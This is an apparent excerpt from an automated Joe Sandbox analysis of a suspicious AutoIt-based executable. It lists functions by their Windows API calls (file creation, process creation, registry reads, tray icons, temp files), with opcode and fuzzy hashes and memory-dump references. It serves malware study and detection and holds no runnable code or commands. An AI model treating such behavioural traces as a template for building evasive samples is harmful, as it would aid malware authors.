                                                                                                                • Instruction ID: 474e351931015d79b386e61f0ad645a3827a1092bc35edb9cafacdcca831e9e1
                                                                                                                • Opcode Fuzzy Hash: bd1455cde96a76f0e648419fc028e10c7cc0dc4f6c65ee21d054cfd95a4cb802
                                                                                                                • Instruction Fuzzy Hash: 26918A71A0425DAFCF04EFA8DC919EDB7B8FF09314B10442AF816EB2A1DB74A945CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01673988: Sleep.KERNELBASE(000001F4), ref: 01673999
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01673BE0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: 4QPENH1406E054T3LP225CVSFZUR
                                                                                                                • API String ID: 2694422964-3606023294
                                                                                                                • Opcode ID: 9d4ce5af7830517fd1775bb1d461483df9d0eb826f4e9fdaee0e879d0ce5c4f0
                                                                                                                • Instruction ID: 2a45e24a662a3e45434a805bff159badbeebf391a013b21b4c910e4191e666a0
                                                                                                                • Opcode Fuzzy Hash: 9d4ce5af7830517fd1775bb1d461483df9d0eb826f4e9fdaee0e879d0ce5c4f0
                                                                                                                • Instruction Fuzzy Hash: 2C618230D04288DBEF11DBB4C854BDEBBB9AF15304F044199E6487B2C1D7BA1B49CBA5
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008E35A1,SwapMouseButtons,00000004,?), ref: 008E35D4
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008E35A1,SwapMouseButtons,00000004,?,?,?,?,008E2754), ref: 008E35F5
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,008E35A1,SwapMouseButtons,00000004,?,?,?,?,008E2754), ref: 008E3617
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                • Opcode ID: 87e0112736d3ac048d3401a0156cbaf5f9889ded38a721ec2fe308b7ae61cd6e
                                                                                                                • Instruction ID: 09a6a9c387a40337a0c24b3c8d7f3c2a57769706fe459eb533316a648d163143
                                                                                                                • Opcode Fuzzy Hash: 87e0112736d3ac048d3401a0156cbaf5f9889ded38a721ec2fe308b7ae61cd6e
                                                                                                                • Instruction Fuzzy Hash: 89115A71514248BFDB21CFA5EC48DAEB7B8FF16740F014469F805E7220D2719F40A760
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4EE5: _fseek.LIBCMT ref: 008E4EFD
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949824
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949837
                                                                                                                • _free.LIBCMT ref: 009496A2
                                                                                                                • _free.LIBCMT ref: 009496A9
                                                                                                                • _free.LIBCMT ref: 00949714
                                                                                                                  • Part of subcall function 00902D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00909A24), ref: 00902D69
                                                                                                                  • Part of subcall function 00902D55: GetLastError.KERNEL32(00000000,?,00909A24), ref: 00902D7B
                                                                                                                • _free.LIBCMT ref: 0094971C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                • String ID:
                                                                                                                • API String ID: 1552873950-0
                                                                                                                • Opcode ID: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
                                                                                                                • Instruction ID: 80073560f50c11fa28977e0e68efaa597ace554fd0acd74bff7f3f97fe6e527a
                                                                                                                • Opcode Fuzzy Hash: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
                                                                                                                • Instruction Fuzzy Hash: 3C514CB1D04258AFDF259F65DC85A9EBBB9FF89300F10049EF609A3281DB715A80CF59
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2782032738-0
                                                                                                                • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                • Instruction ID: ba51d46198fab5b221f95191e92686c541a3c3271b0e392a21c9fb80eea900dd
                                                                                                                • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                • Instruction Fuzzy Hash: F941A4F5B007469FDB18CE69C884AAE77AAEF85360B24C93DEA15C76C0E770DD408B40
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 008E44CF
                                                                                                                  • Part of subcall function 008E407C: _memset.LIBCMT ref: 008E40FC
                                                                                                                  • Part of subcall function 008E407C: _wcscpy.LIBCMT ref: 008E4150
                                                                                                                  • Part of subcall function 008E407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008E4160
                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 008E4524
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E4533
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0091D4B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378193009-0
                                                                                                                • Opcode ID: 210b6b89b8bb59c2b20673d1893e7cfe132cf55127616d257ca79b64b7242e70
                                                                                                                • Instruction ID: f1f23bbf361e71743601faf2d88075065b8ccee585ef88d60fcf1f15961129ff
                                                                                                                • Opcode Fuzzy Hash: 210b6b89b8bb59c2b20673d1893e7cfe132cf55127616d257ca79b64b7242e70
                                                                                                                • Instruction Fuzzy Hash: 9121D770609788AFE732DB249859BE7BBECEF06314F04049DE69E961D1C3742984DB51
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0091EA39
                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0091EA83
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                  • Part of subcall function 00900791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009007B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                • String ID: X
                                                                                                                • API String ID: 3777226403-3081909835
                                                                                                                • Opcode ID: 45a92dbec912bf8148f668ab2ffed16d31cf4596519373f6ffa7cf16fc8fb7d9
                                                                                                                • Instruction ID: e70be66205f3c18d09493b72a4793c07185431eeb92994bf409e0c98aba88762
                                                                                                                • Opcode Fuzzy Hash: 45a92dbec912bf8148f668ab2ffed16d31cf4596519373f6ffa7cf16fc8fb7d9
                                                                                                                • Instruction Fuzzy Hash: F021C630A1428C9BCF119F98DC45BEE7BFCAF4A714F004019E518E7241DBF459898F91
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                • Opcode ID: d454b82fa66a162b44d108a1e71eb40c57babba85366ec751b6ac2a6f24d8b6e
                                                                                                                • Instruction ID: 7ea0d98903834b97eb5414749b7be668eb5a9f4f2b60f2a8e944f2f172397a8c
                                                                                                                • Opcode Fuzzy Hash: d454b82fa66a162b44d108a1e71eb40c57babba85366ec751b6ac2a6f24d8b6e
                                                                                                                • Instruction Fuzzy Hash: 3F01F971C042187EDB18CAA8CC1AFEE7BFCDB11301F00459EF552D21C1E875A6048B60
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 016726FD
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0167271C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CreateExit
                                                                                                                • String ID: D
                                                                                                                • API String ID: 126409537-2746444292
                                                                                                                • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                                                                • Instruction ID: f45dd244fefe51250bc374a9d91f1637375972bd122d92b270861824a152f91e
                                                                                                                • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                                                                • Instruction Fuzzy Hash: 55F0EC7554024CABDB60EFE0CD49FEE7779BF44701F508508FB0A9A284DB7496088B61
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 009498F8
                                                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0094990F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: facdbeb67b902fe50e3140653cb7994cee4f4661223fd91b1169e05266a28c2d
                                                                                                                • Instruction ID: 0f7dfb9bc31ae44216b771c8659e3b7943eeca7ee4fb753043d39fdb95a84f34
                                                                                                                • Opcode Fuzzy Hash: facdbeb67b902fe50e3140653cb7994cee4f4661223fd91b1169e05266a28c2d
                                                                                                                • Instruction Fuzzy Hash: FED05E7954430DABDB50DBA4EC1EF9A773CE704704F0002B5FA64910A1EAB095989FA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b29ed6ec31d9b6b80456ef77bd766314ad7c47aded320609298f37c21969b3e
                                                                                                                • Instruction ID: 8980dcc4e29b2aabc8bc013172e8aced2db0f098fe2bb3321daeecf22d50ec25
                                                                                                                • Opcode Fuzzy Hash: 2b29ed6ec31d9b6b80456ef77bd766314ad7c47aded320609298f37c21969b3e
                                                                                                                • Instruction Fuzzy Hash: 11F136B16083419FCB14DF29C480A6ABBE5FF89314F14892EF8999B351D774E949CF82
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00900193
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0090019B
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009001A6
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009001B1
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009001B9
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009001C1
                                                                                                                  • Part of subcall function 008F60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008EF930), ref: 008F6154
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008EF9CD
                                                                                                                • OleInitialize.OLE32(00000000), ref: 008EFA4A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009245C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1986988660-0
                                                                                                                • Opcode ID: f4f91776db34fd3d6fc3cd04299176ff870c8f8a1d1edd10f2cfd7eaa2e7aa5d
                                                                                                                • Instruction ID: ab356007be7888bea746e4f43731e284efc60bd0a2ea77d7fa41d01f131e1f90
                                                                                                                • Opcode Fuzzy Hash: f4f91776db34fd3d6fc3cd04299176ff870c8f8a1d1edd10f2cfd7eaa2e7aa5d
                                                                                                                • Instruction Fuzzy Hash: F581ACB0B2DB40DFC794DF79A8446187BE5FF9E306752812AE119CB272EB704484AF91
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 008E4370
                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E4415
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E4432
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_$_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1505330794-0
                                                                                                                • Opcode ID: 82b85c4d078aad7e6bd021df90c0b5791ce2705994b052fce21443ca46c4fcbd
                                                                                                                • Instruction ID: bcc4aed31d6dff838269a63c3a0733d49f8894d00cd465f05bc6416c052ad928
                                                                                                                • Opcode Fuzzy Hash: 82b85c4d078aad7e6bd021df90c0b5791ce2705994b052fce21443ca46c4fcbd
                                                                                                                • Instruction Fuzzy Hash: 073184706097419FC721DF25D884B9BBBF8FF4A308F00092EE59AC2291D771A944DB92
                                                                                                                APIs
                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 00905733
                                                                                                                  • Part of subcall function 0090A16B: __NMSG_WRITE.LIBCMT ref: 0090A192
                                                                                                                  • Part of subcall function 0090A16B: __NMSG_WRITE.LIBCMT ref: 0090A19C
                                                                                                                • __NMSG_WRITE.LIBCMT ref: 0090573A
                                                                                                                  • Part of subcall function 0090A1C8: GetModuleFileNameW.KERNEL32(00000000,009A33BA,00000104,?,00000001,00000000), ref: 0090A25A
                                                                                                                  • Part of subcall function 0090A1C8: ___crtMessageBoxW.LIBCMT ref: 0090A308
                                                                                                                  • Part of subcall function 0090309F: ___crtCorExitProcess.LIBCMT ref: 009030A5
                                                                                                                  • Part of subcall function 0090309F: ExitProcess.KERNEL32 ref: 009030AE
                                                                                                                  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
                                                                                                                • RtlAllocateHeap.NTDLL(01440000,00000000,00000001,00000000,?,?,?,00900DD3,?), ref: 0090575F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1372826849-0
                                                                                                                • Opcode ID: df5586cf70ed86ca4dce0d0243cad770303db1c4351fd1f4ee90a87ea30e05bd
                                                                                                                • Instruction ID: fefd61d068a3ddd08927116f6ca18240ea7601740bfab293135bee180bf8e687
                                                                                                                • Opcode Fuzzy Hash: df5586cf70ed86ca4dce0d0243cad770303db1c4351fd1f4ee90a87ea30e05bd
                                                                                                                • Instruction Fuzzy Hash: 2601B176358B02EED6102738EC82B2F739C9FC2761F52053AF419DA1C1DEB49C00AAA1
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00949548,?,?,?,?,?,00000004), ref: 009498BB
                                                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00949548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009498D1
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00949548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009498D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3397143404-0
                                                                                                                • Opcode ID: ccf8f7573696d0d618f3eb36587a6413c5a1af148df41643de31984d6aba6ff3
                                                                                                                • Instruction ID: e41ff700f4880dae0d898ad6e9bc611c9bba92c99447d864a98ce6b7697ccbf7
                                                                                                                • Opcode Fuzzy Hash: ccf8f7573696d0d618f3eb36587a6413c5a1af148df41643de31984d6aba6ff3
                                                                                                                • Instruction Fuzzy Hash: FDE08632155214BBD7211B54FC09FCA7B59AB067A0F114224FB14691E087F12511A798
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00948D1B
                                                                                                                  • Part of subcall function 00902D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00909A24), ref: 00902D69
                                                                                                                  • Part of subcall function 00902D55: GetLastError.KERNEL32(00000000,?,00909A24), ref: 00902D7B
                                                                                                                • _free.LIBCMT ref: 00948D2C
                                                                                                                • _free.LIBCMT ref: 00948D3E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                                                                                • Instruction ID: a96114d1f8fbec452178fc90700708fdd87b13ea775e762d9528cc90faf8e816
                                                                                                                • Opcode Fuzzy Hash: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                                                                                • Instruction Fuzzy Hash: EAE017A1A026214ACB24AAB8B948F9B23EC4F9C752B54091EF40DD71C6CE64FC828128
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 0-4196123274
